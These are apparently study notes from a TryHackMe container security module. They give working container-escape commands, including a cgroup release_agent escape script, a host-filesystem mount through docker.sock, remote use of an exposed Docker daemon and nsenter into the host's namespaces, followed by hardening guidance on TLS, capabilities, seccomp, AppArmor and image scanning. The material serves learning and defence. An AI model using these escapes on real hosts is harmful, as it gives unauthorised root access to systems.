Container Security
Notes from the 'Container Security' module of TryHackMe
Container Vulnerabilities
Privileged Containers
Docker containers can be run in two modes -
User mode - interacts with the Host Operating System through Docker Engine
Privileged - interacts directly with the Host OS
If a container is running with privileged access to the OS, commands can effectively be executed as root on the host. You can view capabilities of the container by running capsh --print.
Given below is an exploit on a privileged container using the mount syscall -
Steps involved in the exploit -
Create a group to use the Linux kernel to write and execute the exploit. The kernel uses cgroups to manage processes on the OS. Since cgroups can be managed as root on the host, it can be mounted to /tmp/cgrp on the container.
For the exploit to execute, we have to tell the kernel to run the code. Adding 1 to /tmp/cgrp/x/notify_on_release tells the kernel to execute something once the "cgroup" finishes.
Find out where the container's files are stored on the host and store it as a variable.
Print the location of the exploit on the host system into release_agent so that the exploit will be executed by "cgroup" once it is released.
Turn the exploit into a shell on the host.
Execute a command, cat /home/user1/flag.txt > $host_path/flag.txt, to print the contents of flag.txt into a file on the container.
Make the exploit executable.
Create a process to store that into /tmp/cgrp/x/cgroup.procs so that once the process is released, the contents will be executed.
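The exploit listing itself is not preserved in these notes. The steps above can be sketched as the shell function below, modelled on the publicly documented release_agent technique. It assumes a privileged container on a cgroup v1 host with the rdma controller available and the overlay2 storage driver; the function name and the child cgroup "x" are illustrative choices, not part of the original notes.

```shell
# Sketch only: assumes cgroup v1, the rdma controller and overlay2 storage.
# Defined as a function so nothing runs until it is called explicitly.
escape_via_release_agent() {
    # 1. Mount a cgroup hierarchy and create a child cgroup named "x".
    mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
    # 2. Ask the kernel to run the release agent once "x" becomes empty.
    echo 1 > /tmp/cgrp/x/notify_on_release
    # 3. Find where the container's files are stored on the host.
    host_path=$(sed -n 's/.*upperdir=\([^,]*\).*/\1/p' /etc/mtab)
    # 4. Register the exploit (as seen from the host) as the release agent.
    echo "$host_path/exploit" > /tmp/cgrp/release_agent
    # 5-6. Write the exploit: a shell script that copies the flag.
    echo '#!/bin/sh' > /exploit
    echo "cat /home/user1/flag.txt > $host_path/flag.txt" >> /exploit
    # 7. Make the exploit executable.
    chmod a+x /exploit
    # 8. Put a short-lived process into "x"; when it exits, the agent fires.
    sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
}
```

Under those assumptions, calling escape_via_release_agent inside the lab container should leave a copy of the flag at /flag.txt in the container.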
Escaping via Exposed Docker Daemon
When you interact with the Docker Engine (by running commands such as docker run), the communication goes through a Unix socket unless the command targets a remote Docker host. Unix sockets use filesystem permissions, meaning that you must be root or a member of the docker group to run Docker commands.
The socket will be mounted in the container as a docker.sock file. You can search for the file using the find command. On Ubuntu systems, it is located in the /var/run directory.
You can use the Docker daemon to create a new container and mount the host's filesystem into the container to indirectly gain access to the host's filesystem. This can be achieved by running the following command -
The command does the following -
Starts a new container with the host's file system mounted to /mnt in the new container
Runs the container interactively using -it
Changes the root directory of the container to /mnt
Tells the container to run sh to gain a shell and execute commands in the container
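The command itself is missing from these notes. A sketch consistent with the four points above follows; it assumes the docker CLI is available inside the container and that an alpine image can be used (both are assumptions), and the function names are illustrative.

```shell
# Sketch: assumes the docker CLI exists in the container and that the
# daemon can run an "alpine" image. Function names are illustrative.
find_docker_socket() {
    # Search the filesystem for the mounted socket, hiding permission errors.
    find / -name docker.sock 2>/dev/null
}

mount_host_root() {
    # -v /:/mnt      mount the host filesystem at /mnt in the new container
    # --rm           remove the container on exit (added here for tidiness)
    # -it            run interactively
    # chroot /mnt sh change the root directory to /mnt, then start sh
    docker run -v /:/mnt --rm -it alpine chroot /mnt sh
}
```

Running find_docker_socket first confirms the socket is present; mount_host_root then opens the shell described above.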
Remote Code Execution via Exposed Docker Daemon
Docker can also use TCP sockets to achieve IPC. It can be administered remotely using tools such as Portainer or Jenkins to deploy containers for testing code. When configured for remote access, Docker Engine listens on a port (2375 by default). This makes the daemon easy to reach remotely, but it is difficult to do securely. You can check whether a device exposes Docker remotely by using nmap -
An exposed docker daemon can be interacted with by using curl.
The Docker CLI can also send commands to the target. Add -H followed by the target's address to point the CLI at it. You can then run subcommands such as network, images, exec and run.
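The nmap, curl and docker invocations were not preserved in these notes. The following is a minimal sketch of the three steps; the TARGET address is a hypothetical placeholder and the function names are illustrative.

```shell
# Hypothetical target address; override by exporting TARGET beforehand.
TARGET="${TARGET:-10.10.10.10}"

scan_docker_port() {
    # Check whether the default remote Docker port is open.
    nmap -sV -p 2375 "$TARGET"
}

docker_api_version() {
    # The Engine API answers plain HTTP requests on the exposed port.
    curl -s "http://$TARGET:2375/version"
}

docker_remote() {
    # Forward any docker subcommand to the remote daemon via -H.
    docker -H "tcp://$TARGET:2375" "$@"
}
```

For example, docker_remote ps would list the containers running on the target, assuming the daemon is reachable without authentication.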
Abusing Namespaces
Sometimes, containers will share the same namespace as the host OS for communication between the container and host. This can be abused by using the nsenter command. The command allows you to execute or start processes and place them within the same namespace as another process.
You can abuse the fact that the container can see the /sbin/init process on the host to launch new commands such as a bash shell on the host. This can be done using the following command -
The command does the following -
--target 1: Sets the target of the shell command as the namespace of the special system process (PID 1) to gain root
--mount: Enters the mount namespace; if no file is specified, it enters the mount namespace of the target process.
--uts: Allows you to share the same UTS (Unix Timesharing System) namespace as the target process, meaning the same hostname is used; mismatching hostnames can cause connection issues.
--ipc: Enters the IPC (Inter-process communication) namespace of the process, which is important as it means that memory can be shared
--net: Enters the network namespace to allow you to interact with network-related features of the system; for example, the network interfaces can be used to open a new connection like a stable reverse shell on the host.
/bin/bash: bash then executes in the same namespaces (and with the same privileges) as the host's PID 1.
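The command is not preserved in these notes; a sketch matching the breakdown above is given here. It assumes the container shares the host's PID namespace and has enough privileges to call nsenter. The function name is illustrative.

```shell
# Sketch: assumes the container can see the host's PID 1 and is allowed
# to enter its namespaces.
enter_host_namespaces() {
    # Join the mount, UTS, IPC and network namespaces of PID 1, then run bash.
    nsenter --target 1 --mount --uts --ipc --net /bin/bash
}
```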
Container Hardening
Protecting the Docker Daemon
Make sure to use secure communication and authentication methods to prevent unauthorised access to the Docker daemon.
SSH
You can use SSH authentication to interact with other devices running Docker. Docker uses contexts which can be thought of as profiles. Profiles allow developers to save and swap between configurations for other devices. You must have SSH access to the remote device and the user account on the remote device must have permission to execute Docker commands.
Use the following command to create a Docker context on your device -
Run the following command to switch to the created context -
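The two commands are missing from these notes. A minimal sketch of creating and switching contexts follows; the user, host and context name are hypothetical placeholders.

```shell
# Hypothetical remote account and context name.
REMOTE="${REMOTE:-myuser@remotehost}"
CONTEXT_NAME="${CONTEXT_NAME:-development-environment-host}"

create_ssh_context() {
    # Save an SSH endpoint as a named context (profile).
    docker context create \
        --docker "host=ssh://$REMOTE" \
        --description "Development Environment" \
        "$CONTEXT_NAME"
}

use_ssh_context() {
    # Later docker commands are sent to the remote device.
    docker context use "$CONTEXT_NAME"
}

use_default_context() {
    # Switch back to the local daemon.
    docker context use default
}
```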
TLS Encryption
The Docker daemon can also be interacted with using HTTP/S. When configured in TLS mode, Docker only accepts remote commands from clients whose certificates have been signed against the device you wish to execute Docker commands on.
To configure TLS mode run the following command on the server that you are issuing commands to -
Run the following command on the client that you are issuing commands from -
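The server and client commands are missing from these notes. The sketch below follows the flag layout used in Docker's TLS documentation; the certificate file names and SERVER_IP are placeholders, and generating the certificates is assumed to have been done already.

```shell
# Placeholder address of the Docker host.
SERVER_IP="${SERVER_IP:-10.10.10.10}"

start_tls_daemon() {
    # Server side: only accept clients whose certificate the CA has signed.
    dockerd --tlsverify --tlscacert=ca.pem --tlscert=server-cert.pem \
        --tlskey=server-key.pem -H=0.0.0.0:2376
}

query_tls_daemon() {
    # Client side: present a signed client certificate with each command.
    docker --tlsverify --tlscacert=ca.pem --tlscert=cert.pem \
        --tlskey=key.pem -H="$SERVER_IP:2376" info
}
```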
Implementing Control Groups
Control groups (or cgroups) are a feature of the Linux kernel that facilitates restricting and prioritising the amount of system resources a process can utilise. They improve system stability and allow administrators to track the use of system resources better.
For Docker, implementing cgroups helps achieve isolation and stability. This behaviour is not enabled by default and must be enabled when starting a container. Some examples of setting limits to resources for a container -
Use the following command to update the setting once the container is running -
You can view information about a container using the following command -
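The example commands are not preserved in these notes. A sketch of setting, updating and inspecting limits follows; the image and container names and the specific limit values are illustrative assumptions.

```shell
# Hypothetical image and container names.
IMAGE="${IMAGE:-myimage}"
CONTAINER="${CONTAINER:-mycontainer}"

run_with_cpu_limit() {
    # Limit the container to one CPU core.
    docker run -it --cpus="1" "$IMAGE"
}

run_with_memory_limit() {
    # Limit the container to 20 MB of memory.
    docker run -it --memory="20m" "$IMAGE"
}

update_memory_limit() {
    # Change the limit on a container that is already running.
    docker update --memory="40m" "$CONTAINER"
}

inspect_container() {
    # Prints the container's configuration, including its resource limits.
    docker inspect "$CONTAINER"
}
```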
Read more about cgroups at -
Preventing "Over-Privileged" Containers
Capabilities are a security feature of Linux that determines what processes can and cannot do on a granular level. They allow you to fine-tune what privileges a process has. Some capabilities are -
CAP_NET_BIND_SERVICE - allows services to bind to ports, specifically those under 1024, which usually requires root privileges
CAP_SYS_ADMIN - provides a variety of admin privileges such as mounting/unmounting file systems, changing network settings and performing system reboots/shutdowns
CAP_SYS_RESOURCE - allows a process to modify the maximum limit of resources available
Privileged containers have full root access and therefore it is better to assign capabilities to containers individually instead of running containers with the --privileged flag. The following command removes all other capabilities and adds the NET_BIND_SERVICE capability to the webserver container -
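The command is missing from these notes; a minimal sketch is given here, assuming an image named mywebserver (a placeholder). The function name is illustrative.

```shell
run_webserver_min_caps() {
    # Drop every capability, then add back only the one needed to bind
    # to ports below 1024.
    docker run -it --rm --cap-drop=ALL --cap-add=NET_BIND_SERVICE mywebserver
}
```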
You can determine what capabilities are assigned to a process by using the capsh --print command. Read more about capabilities at -
Seccomp and AppArmor
Seccomp is an important security feature of Linux that restricts the actions that a program can perform. It allows the user to create and enforce a list of rules describing which actions (system calls) the application can make. For example, it can allow the application to make a system call to read a file but not allow it to make a system call to open a network connection. This reduces an attacker's ability to execute malicious commands whilst maintaining the application's functionality.
An example Seccomp profile for a web server that allows files to be read and written but does not allow execution (execve, execveat) -
Apply a profile to a container -
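The profile and the command that applies it are not preserved in these notes. The sketch below writes a small profile that allows system calls by default and returns an error for execve and execveat, then passes it to docker run. The file location, the single listed architecture and the image name are assumptions.

```shell
# Write the profile to a temporary location (path is an assumption).
SECCOMP_PROFILE="${SECCOMP_PROFILE:-$(mktemp -d)/profile.json}"

cat > "$SECCOMP_PROFILE" <<'EOF'
{
  "defaultAction": "SCMP_ACT_ALLOW",
  "architectures": ["SCMP_ARCH_X86_64"],
  "syscalls": [
    {
      "names": ["execve", "execveat"],
      "action": "SCMP_ACT_ERRNO"
    }
  ]
}
EOF

run_with_seccomp() {
    # "mycontainer" is a placeholder image name.
    # Note: the filter is in place before the entrypoint is executed, so a
    # profile this strict may stop the container from starting at all;
    # treat it as an illustration of the file format.
    docker run --rm -it --security-opt "seccomp=$SECCOMP_PROFILE" mycontainer
}
```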
Resources -
AppArmor is a security feature of Linux similar to Seccomp. It works differently, however, as it is not included in the application but in the OS. It is a Mandatory Access Control (MAC) system that determines the actions a process can execute based on a set of rules at the OS level.
Given below is a profile that makes sure that a container has the following capabilities:
It can read files located in /var/www/, /etc/apache2/mime.types and /run/apache2.
It can read and write to /var/log/apache2.
It can bind to a TCP socket for port 80 but not other ports or protocols such as UDP.
It cannot read from directories such as /bin, /lib, /usr.
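The profile is missing from these notes. The sketch below approximates the rules listed above, using rule forms that appear in Docker's own AppArmor examples. The profile name and file location are assumptions, and the sketch only restricts the socket family and protocol; it does not express the port 80 restriction.

```shell
# Write the profile to a temporary location (path and name are assumptions).
APPARMOR_PROFILE="${APPARMOR_PROFILE:-$(mktemp -d)/docker-apache-sketch}"

cat > "$APPARMOR_PROFILE" <<'EOF'
#include <tunables/global>

profile docker-apache-sketch flags=(attach_disconnected,mediate_deleted) {
  # Read-only content and configuration
  /var/www/** r,
  /etc/apache2/mime.types r,
  /run/apache2/** r,

  # Logs can be read and written
  /var/log/apache2/** rw,

  # TCP is allowed, UDP is denied (no port is specified in this sketch)
  network inet tcp,
  deny network inet udp,

  # No reads from system directories
  deny /bin/** r,
  deny /lib/** r,
  deny /usr/** r,
}
EOF
```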
To apply an AppArmor profile to a container, we need to -
Ensure that it is installed on the system using the command - sudo aa-status.
Create a profile.
Load the profile into AppArmor.
Run the container with the created profile.
Import the profile into AppArmor -
Apply it to the container at runtime -
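The import and run commands are not preserved in these notes. A sketch of the steps follows; the profile file path, profile name and image name are hypothetical. Note that the apparmor security option takes the name of a loaded profile, not the path of the file.

```shell
# Hypothetical profile file and the profile name declared inside it.
PROFILE_FILE="${PROFILE_FILE:-/etc/apparmor.d/containers/docker-apache-sketch}"
PROFILE_NAME="${PROFILE_NAME:-docker-apache-sketch}"

check_apparmor() {
    # Confirms AppArmor is installed and lists loaded profiles.
    sudo aa-status
}

load_profile() {
    # -r replaces an existing profile of the same name, -W writes the cache.
    sudo apparmor_parser -r -W "$PROFILE_FILE"
}

run_with_apparmor() {
    # "mycontainer" is a placeholder image name.
    docker run --rm -it --security-opt "apparmor=$PROFILE_NAME" mycontainer
}
```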
Resources -
Reviewing Docker Images
You should analyse the code for Dockerfiles before using them to check for vulnerabilities or malicious actions. You can use Dive for this. It is a tool to reverse engineer Docker images by inspecting what is executed and changed at each layer during the build process.
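As a minimal sketch, Dive takes the image to inspect as its argument; the default image name below is only an example and the function name is illustrative.

```shell
inspect_layers() {
    # Opens Dive's layer-by-layer view of the given image
    # (defaults to nginx:latest as an example).
    dive "${1:-nginx:latest}"
}
```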
Compliance and Benchmarking
Using Docker Scout to scan an nginx image for known vulnerabilities -
Using Grype to scan a Docker image for vulnerabilities -
Using Grype to scan an exported image archive (exported using docker image save) -
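The scanning commands are missing from these notes. The sketch below shows one plausible form of each, assuming Docker Scout and Grype are installed; the image name and archive file name are placeholders.

```shell
# Example image to scan.
IMAGE="${IMAGE:-nginx:latest}"

scan_with_scout() {
    # List known CVEs for the image with Docker Scout.
    docker scout cves "$IMAGE"
}

scan_with_grype() {
    # Scan every layer of the image, not only the final filesystem.
    grype "$IMAGE" --scope all-layers
}

scan_saved_image() {
    # Export the image to a tar archive, then scan the archive.
    docker image save "$IMAGE" -o image.tar && grype ./image.tar
}
```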